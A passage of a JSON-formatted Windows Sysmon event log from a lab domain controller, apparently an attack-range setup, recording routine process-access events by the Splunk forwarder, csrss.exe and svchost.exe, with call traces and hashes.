(rs1_release.160715-1616)","Description":"Windows Command Processor","Product":"Microsoft® Windows® Operating System","Company":"Microsoft Corporation","OriginalFileName":"Cmd.Exe","CommandLine":"C:\\Windows\\system32\\cmd.exe /c \"\"C:\\Program Files\\SplunkUniversalForwarder\\etc\\system\\bin\\WinNetMon.cmd\" --scheme\"","CurrentDirectory":"C:\\Windows\\system32\\","User":"NT AUTHORITY\\SYSTEM","LogonGuid":"{E2A3D6B1-1058-5F25-0000-0020E7030000}","LogonId":"0x3e7","TerminalSessionId":"0","IntegrityLevel":"System","Hashes":"MD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A","ParentProcessGuid":"{E2A3D6B1-106B-5F25-0000-0010C1C00200}","ParentProcessId":"2792","ParentImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe","ParentCommandLine":"\"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\" service","EventReceivedTime":"2020-08-01 06:49:21","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:20","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2161,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:20.130\r\nSourceProcessGUID: {E2A3D6B1-106B-5F25-0000-0010C1C00200}\r\nSourceProcessId: 2792\r\nSourceThreadId: 3812\r\nSourceImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\r\nTargetProcessGUID: {E2A3D6B1-1070-5F25-0000-0010F6000400}\r\nTargetProcessId: 3968\r\nTargetImage: C:\\Windows\\system32\\cmd.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+ce6a3b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+7d35e7|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+7cdcb9|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+7ca4ec|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+7ca0a3|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+7c9f0d|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+6d7908|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+6de2ee|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+6b29fa|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+6b4274|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+e42dc|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+ec682|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+e9959|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+d7f31|C:\\Windows\\System32\\sechost.dll+14342|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:20.130","SourceProcessGUID":"{E2A3D6B1-106B-5F25-0000-0010C1C00200}","SourceProcessId":"2792","SourceThreadId":"3812","SourceImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe","TargetProcessGUID":"{E2A3D6B1-1070-5F25-0000-0010F6000400}","TargetProcessId":"3968","TargetImage":"C:\\Windows\\system32\\cmd.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+ce6a3b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+7d35e7|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+7cdcb9|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+7ca4ec|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+7ca0a3|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+7c9f0d|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+6d7908|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+6de2ee|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+6b29fa|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+6b4274|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+e42dc|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+ec682|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+e9959|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+d7f31|C:\\Windows\\System32\\sechost.dll+14342|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:49:21","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:20","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2162,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:20.130\r\nSourceProcessGUID: {E2A3D6B1-1058-5F25-0000-0010E8420000}\r\nSourceProcessId: 644\r\nSourceThreadId: 804\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {E2A3D6B1-1070-5F25-0000-0010F6000400}\r\nTargetProcessId: 3968\r\nTargetImage: C:\\Windows\\system32\\cmd.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:20.130","SourceProcessGUID":"{E2A3D6B1-1058-5F25-0000-0010E8420000}","SourceProcessId":"644","SourceThreadId":"804","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{E2A3D6B1-1070-5F25-0000-0010F6000400}","TargetProcessId":"3968","TargetImage":"C:\\Windows\\system32\\cmd.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 06:49:21","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:20","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2163,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:20.130\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:20.130","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:49:21","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:20","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2164,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:20.130\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:20.130","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:49:21","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:20","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2165,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:20.130\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:20.130","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:49:21","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:20","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2166,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:20.130\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:20.130","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:49:21","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:20","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2167,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:20.130\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:20.130","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:49:21","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:20","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2168,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:20.130\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:20.130","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C: